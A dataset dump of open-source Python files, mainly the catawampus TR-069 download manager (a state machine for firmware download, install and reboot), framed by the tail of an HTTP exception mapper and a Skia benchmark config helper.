return HttpHttpVersionNotSupportedException(status, code, message)
elif status == 506:
return HttpVariantAlsoNegotiatesException(status, code, message)
elif status == 507:
return HttpInsufficientStorageException(status, code, message)
elif status == 510:
return HttpNotExtendedException(status, code, message)
return HttpException(status, code, message)
| mit |
ankurjimmy/catawampus | tr/download.py | 5 | 18628 | #!/usr/bin/python
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for tr-69 Download and Scheduled Download."""
__author__ = '[email protected] (Denton Gentry)'
import collections
import datetime
import errno
import os
import shutil
import time
import urlparse
import google3
import tornado
import tornado.httpclient
import tornado.ioloop
import tornado.web
import core
import helpers
import http_download
import persistobj
# Persistent object storage filename
DNLDROOTNAME = 'tr69_dnld'
BOOTROOTNAME = 'tr69_boot'
class Installer(object):
"""Install a downloaded image and reboot.
This default implementation returns an error response. Platforms are
expected to implement their own Install object, and set
tr.download.INSTALLER = their object.
"""
def install(self, file_type, target_filename, callback):
INTERNAL_ERROR = 9002
self.callback(faultcode=INTERNAL_ERROR,
faultstring='No installer for this platform.',
must_reboot=False)
def reboot(self):
return False
# Class to be called after image is downloaded. Platform code is expected
# to put its own installer here, the default returns failed to install.
INSTALLER = Installer
# Unit tests can substitute mock objects here
DOWNLOAD_CLIENT = {
'http': http_download.HttpDownload,
'https': http_download.HttpDownload
}
# State machine description. Generate a diagram using Graphviz:
# ./download.py
graphviz = r"""
digraph DLstates {
node [shape=box]
START [label="START"]
WAITING [label="WAITING\nstart timer"]
DOWNLOADING [label="DOWNLOADING\nstart download"]
INSTALLING [label="INSTALLING\nstart install"]
REBOOTING [label="REBOOTING\ninitiate reboot"]
EXITING [label="EXITING\nsend TransferComplete"]
DONE [label="DONE\ncleanup, not a\nreal state"]
START -> WAITING
WAITING -> DOWNLOADING [label="timer\nexpired"]
DOWNLOADING -> INSTALLING [label="download\ncomplete"]
DOWNLOADING -> EXITING [label="download\nfailed"]
INSTALLING -> REBOOTING [label="install\ncomplete"]
INSTALLING -> EXITING [label="install\nfailed"]
INSTALLING -> EXITING [label="must_reboot=False"]
REBOOTING -> EXITING [label="rebooted,\ncorrect image"]
REBOOTING -> EXITING [label="rebooted,\nincorrect image"]
EXITING -> DONE [label="receive\nTransferCompleteResponse"]
}
"""
class Download(object):
"""A state machine to handle a single tr-69 Download RPC."""
# States in the state machine. See docs/download.dot for details
START = 'START'
WAITING = 'WAITING'
DOWNLOADING = 'DOWNLOADING'
INSTALLING = 'INSTALLING'
REBOOTING = 'REBOOTING'
EXITING = 'EXITING'
# State machine events
EV_START = 1
EV_TIMER = 2
EV_DOWNLOAD_COMPLETE = 3
EV_INSTALL_COMPLETE = 4
EV_REBOOT_COMPLETE = 5
EV_TCRESPONSE = 6
def __init__(self, stateobj, transfer_complete_cb,
download_dir=None, ioloop=None):
"""Download object.
Args:
stateobj: a PersistentObject to store state across reboots.
This class requires that command_key and url attributes be present.
transfer_complete_cb: function to send a TransferComplete message.
ioloop: Tornado ioloop. Unit tests can pass in a mock.
"""
self.stateobj = self._restore_dlstate(stateobj)
self.transfer_complete_cb = transfer_complete_cb
self.download_dir = download_dir
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.download = None
self.downloaded_fileobj = None
self.downloaded_file = None
self.wait_handle = None
# the delay_seconds started when we received the RPC, even if we have
# downloaded other files and rebooted since then.
if not hasattr(self.stateobj, 'wait_start_time'):
self.stateobj.Update(wait_start_time=time.time())
def CommandKey(self):
return getattr(self.stateobj, 'command_key', None)
def _restore_dlstate(self, stateobj):
"""Re-enter the state machine at a sane state.
This state machine is supposed to download a file, install that file,
reboot, and send a completion. To do this it stores its state to
the filesystem so it can read it back in after a reboot.
If we reboot unexpectedly, like a power failure, we may have to backtrack.
For example if we had downloaded the file to /tmp and then powered off,
we lose the file and have to download it again.
The state machine can only resume into the START and REBOOTING states.
Args:
stateobj: the PersistentObject for this transfer
Returns:
the stateobj
"""
if not hasattr(stateobj, 'dlstate'):
stateobj.Update(dlstate=self.START)
dlstate = stateobj.dlstate
if dlstate == self.REBOOTING or dlstate == self.EXITING:
stateobj.Update(dlstate=self.REBOOTING)
else:
stateobj.Update(dlstate=self.START)
return stateobj
def _schedule_timer(self):
delay_seconds = getattr(self.stateobj, 'delay_seconds', 0)
now = time.time()
wait_start_time = self.stateobj.wait_start_time
# sanity checks
if wait_start_time > now:
wait_start_time = now
when = wait_start_time + delay_seconds
if when < now:
when = now
self.wait_handle = self.ioloop.add_timeout(
datetime.timedelta(seconds=when-now),
self.timer_callback)
def _new_download_object(self, stateobj):
url = getattr(stateobj, 'url', '')
username = getattr(stateobj, 'username', None)
password = getattr(stateobj, 'password', None)
o = urlparse.urlparse(url)
client = DOWNLOAD_CLIENT[o.scheme]
return client(url=url, username=username, password=password,
download_complete_cb=self.download_complete_callback,
download_dir=self.download_dir)
def _send_transfer_complete(self, faultcode, faultstring, start=0.0, end=0.0):
event_code = getattr(self.stateobj, 'event_code', 'M Download')
self.transfer_complete_cb(dl=self,
command_key=self.stateobj.command_key,
faultcode=faultcode,
faultstring=faultstring,
starttime=start, endtime=end,
event_code=event_code)
def state_machine(self, event, faultcode=0, faultstring='',
downloaded_file=None, must_reboot=False):
dlstate = self.stateobj.dlstate
if dlstate == self.START:
if event == self.EV_START or event == self.EV_REBOOT_COMPLETE:
self.stateobj.Update(dlstate=self.WAITING)
self._schedule_timer()
elif dlstate == self.WAITING:
if event == self.EV_TIMER:
self.download = self._new_download_object(self.stateobj)
self.stateobj.Update(dlstate=self.DOWNLOADING,
download_start_time=time.time())
self.download.fetch()
# TODO(dgentry) : need a timeout, in case download never finishes.
elif dlstate == self.DOWNLOADING:
if event == self.EV_DOWNLOAD_COMPLETE:
self.download = None # no longer needed
if faultcode == 0:
self.installer = INSTALLER(downloaded_file)
self.stateobj.Update(dlstate=self.INSTALLING)
file_type = getattr(self.stateobj, 'file_type', None)
target_filename = getattr(self.stateobj, 'target_filename', None)
self.installer.install(file_type=file_type,
target_filename=target_filename,
callback=self.installer_callback)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.INSTALLING:
if event == self.EV_INSTALL_COMPLETE:
if self.downloaded_file:
helpers.Unlink(self.downloaded_file)
if faultcode == 0:
if must_reboot:
self.stateobj.Update(dlstate=self.REBOOTING)
self.installer.reboot()
else:
end = time.time()
self.stateobj.Update(dlstate=self.EXITING,
download_complete_time=end)
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.REBOOTING:
if event == self.EV_REBOOT_COMPLETE:
# TODO(dgentry) check version, whether image was actually installed
end = time.time()
self.stateobj.Update(dlstate=self.EXITING, download_complete_time=end)
if faultcode == 0:
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.EXITING:
pass
def do_start(self):
return self.state_machine(self.EV_START)
def timer_callback(self):
"""Called by timer code when timeout expires."""
return self.state_machine(self.EV_TIMER)
def download_complete_callback(self, faultcode, faultstring, tmpfile):
print 'Download complete callback.'
name = tmpfile and tmpfile.name or None
self.downloaded_fileobj = tmpfile # keep this around or it auto-deletes
self.downloaded_file = name
return self.state_machine(self.EV_DOWNLOAD_COMPLETE,
faultcode, faultstring,
downloaded_file=name)
def installer_callback(self, faultcode, faultstring, must_reboot):
return self.state_machine(self.EV_INSTALL_COMPLETE, faultcode, faultstring,
must_reboot=must_reboot)
def reboot_callback(self, faultcode, faultstring):
return self.state_machine(self.EV_REBOOT_COMPLETE, faultcode, faultstring)
def cleanup(self):
"""Attempt to stop all activity and clean up resources.
Returns:
False - successfully stopped and cleaned up
string - the reason download cannot be safely cancelled right now.
"""
dlstate = self.stateobj.dlstate
if dlstate == self.INSTALLING:
return 'Download is currently installing to flash'
if dlstate == self.REBOOTING:
return 'Download has been installed, awaiting reboot'
if self.wait_handle:
self.ioloop.remove_timeout(self.wait_handle)
self.wait_handle = None
if self.download:
self.download.close()
self.download = None
self.stateobj.Delete()
def get_queue_state(self):
"""Data needed for GetQueuedTransfers/GetAllQueuedTransfers RPC."""
q = collections.namedtuple(
'queued_transfer_struct',
('CommandKey State IsDownload FileType FileSize TargetFileName'))
q.CommandKey = self.stateobj.command_key
dlstate = self.stateobj.dlstate
if dlstate == self.START or dlstate == self.WAITING:
qstate = 1 # Not yet started
elif dlstate == self.EXITING:
qstate = 3 # Completed, finishing cleanup
else:
qstate = 2 # In progress
q.State = qstate
q.IsDownload = True
q.FileType = getattr(self.stateobj, 'file_type', None)
q.FileSize = getattr(self.stateobj, 'file_size', 0)
q.TargetFileName = getattr(self.stateobj, 'target_filename', '')
return q
# Object to track an individual Download RPC. Unit tests can override this.
DOWNLOADOBJ = Download
class DownloadManager(object):
"""Manage Download requests from the ACS.
Each RPC gets a Download object, which runs a state machine to track
the progress of the operation. The DownloadManager allocates, manages
and deletes the active Download objects.
SPEC: http://www.broadband-forum.org/technical/download/TR-069_Amendment-3.pdf
"""
# Maximum simultaneous downloads. tr-69 requires minimum of 3.
MAXDOWNLOADS = 1
def __init__(self, ioloop=None):
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self._downloads = list()
self._pending_complete = list()
self.config_dir = '/tmp/'
self.download_dir = '/tmp/'
# Function to send RPCs, to be filled in by parent object.
self.send_transfer_complete = None
def NewDownload(self, command_key=None, file_type=None, url=None,
username=None, password=None, file_size=0,
target_filename=None, delay_seconds=0):
"""Initiate a new download, handling a tr-69 Download RPC.
Args:
command_key, file_type, url, username, password, file_size:
target_filename, delay_seconds: as defined in tr-69 Amendment 3
(page 82 of $SPEC)
Raises:
core.ResourcesExceededError: too many simultaneous downloads
core.FileTransferProtocolError: Unsupported URL type, ex: ftp
Returns:
(code, starttime, endtime):
code = status to return (1 == send TransferComplete later, $SPEC pg 85)
starttime, endtime = two floating point numbers in seconds for the
StartTime and CompleteTime of the DownloadResponse.
"""
# TODO(dgentry) check free space?
if len(self._downloads) >= self.MAXDOWNLOADS:
faultstring = 'Max downloads (%d) reached.' % self.MAXDOWNLOADS
raise core.ResourcesExceededError(faultstring)
o = urlparse.urlparse(url)
if o.scheme not in DOWNLOAD_CLIENT:
raise core.FileTransferProtocolError(
'Unsupported URL scheme %s' % o.scheme)
kwargs = dict(command_key=command_key,
file_type=file_type,
url=url,
username=username,
password=password,
file_size=file_size,
target_filename=target_filename,
delay_seconds=delay_seconds,
event_code='M Download')
pobj = persistobj.PersistentObject(objdir=self.config_dir,
rootname=DNLDROOTNAME,
filename=None,
ignore_errors=True,
**kwargs)
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.do_start()
return (1, 0.0, 0.0)
def TransferCompleteCallback(self, dl, command_key, faultcode, faultstring,
starttime, endtime, event_code):
self._downloads.remove(dl)
self._pending_complete.append(dl)
if self.send_transfer_complete:
self.send_transfer_complete(command_key, faultcode, faultstring,
starttime, endtime, event_code)
def RestoreDownloads(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=DNLDROOTNAME)
for pobj in pobjs:
if not hasattr(pobj, 'command_key'):
print 'Download Object %s has no command_key' % pobj.filename
pobj.Delete()
continue
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.reboot_callback(0, None)
def TransferCompleteResponseReceived(self):
dl = self._pending_complete.pop()
dl.cleanup()
def GetAllQueuedTransfers(self):
transfers = list()
for dl in self._downloads:
transfers.append(dl.get_queue_state())
for dl in self._pending_complete:
transfers.append(dl.get_queue_state())
return transfers
def CancelTransfer(self, command_key):
"""Cancel an in-progress transfer.
Args:
command_key: the command_key to cancel. There can be multiple transfers
with the same command_key. $SPEC says to attempt to cancel all of them,
return failure if any cannot be cancelled.
Raises:
core.CancelNotPermitted: download cannot be cancelled right now.
"""
for dl in self._downloads:
if dl.CommandKey() == command_key:
faultstring = dl.cleanup()
if faultstring:
raise core.CancelNotPermitted(faultstring)
else:
self._downloads.remove(dl)
for dl in self._pending_complete:
if dl.CommandKey() == command_key:
raise core.CancelNotPermitted(
'Installed, awaiting TransferCompleteResponse')
def _DelayedReboot(self):
installer = INSTALLER('')
installer.reboot()
def RestoreReboots(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=BOOTROOTNAME)
reboots = []
for pobj in pobjs:
if hasattr(pobj, 'command_key'):
reboots.append(('M Reboot', pobj.command_key))
else:
print 'Reboot object %s has no command_key' % pobj.filename
pobj.Delete()
return reboots
def Reboot(self, command_key):
"""Reboot the system."""
kwargs = dict(command_key=command_key)
pobj = persistobj.PersistentObject(objdir=self.config_dir, rootname=BOOTROOTNAME,
filename=None, **kwargs)
self.ioloop.add_callback(self._DelayedReboot)
def _MakeDirsIgnoreError(self, directory):
"""Make sure a directory exists."""
try:
os.makedirs(directory, 0755)
except OSError:
pass
def SetDirectories(self, config_dir, download_dir):
self.config_dir = os.path.join(config_dir, 'state')
self.download_dir = os.path.join(download_dir, 'dnld')
self._MakeDirsIgnoreError(self.config_dir)
self._MakeDirsIgnoreError(self.download_dir)
def main():
# Generate diagram for Download state machine
import subprocess #pylint: disable-msg=C6204
cmd = ['dot', '-Tpdf', '-odownloadStateMachine.pdf']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
print p.communicate(input=graphviz)[0]
if __name__ == '__main__':
main()
| apache-2.0 |
guorendong/iridium-browser-ubuntu | third_party/skia/tools/bench_pictures_cfg_helper.py | 44 | 3148 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Helper functions to be used in bench_pictures.cfg. """
def Config(**kwargs):
config = {}
for key in kwargs:
config[key] = kwargs[key]
return config
def TileArgs(tile_x, tile_y, timeIndividualTiles=True):
config = {'mode': ['tile', str(tile_x), str(tile_y)]}
if timeIndividualTiles:
config['timeIndividualTiles'] = True
return config
def BitmapConfig(**kwargs):
return Config(config='8888', **kwargs)
def GPUConfig(**kwargs):
return Config(config='gpu', **kwargs)
def TiledBitmapConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return BitmapConfig(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def TiledGPUConfig(tile_x, tile_y, **kwargs):
return GPUConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def TiledConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return Config(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def ViewportBitmapConfig(viewport_x, viewport_y, **kwargs):
return BitmapConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportGPUConfig(viewport_x, viewport_y, **kwargs):
return GPUConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportRTreeConfig(viewport_x, viewport_y, **kwargs):
return RTreeConfig(mode='simple', viewport=[str(viewport_x), str(viewport_y)],
**kwargs)
def ViewportGridConfig(viewport_x, viewport_y, **kwargs):
return GridConfig(viewport_x, viewport_y, mode='simple',
viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def CopyTilesConfig(tile_x, tile_y, **kwargs):
return BitmapConfig(mode=['copyTile', str(tile_x), str(tile_y)], **kwargs)
def RecordConfig(**kwargs):
return BitmapConfig(mode='record', **kwargs)
def PlaybackCreationConfig(**kwargs):
return BitmapConfig(mode='playbackCreation', **kwargs)
def MultiThreadTileConfig(threads, tile_x, tile_y, **kwargs):
return TiledBitmapConfig(tile_x=tile_x, tile_y=tile_y,
timeIndividualTiles=False, multi=str(threads),
**kwargs)
def RTreeConfig(**kwargs):
return BitmapConfig(bbh='rtree', **kwargs)
def GridConfig(tile_x, tile_y, mode, **kwargs):
return BitmapConfig(mode=mode, bbh=['grid', str(tile_x), str(tile_y)],
**kwargs)
def RecordRTreeConfig(**kwargs):
return RTreeConfig(mode='record', **kwargs)
def PlaybackCreationRTreeConfig(**kwargs):
return RTreeConfig(mode='playbackCreation', **kwargs)
def TileRTreeConfig(tile_x, tile_y, **kwargs):
return RTreeConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def RecordGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x=tile_x, tile_y=tile_y, mode='record', **kwargs)
def PlaybackCreationGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x, tile_y, mode='playbackCreation')
| bsd-3-clause |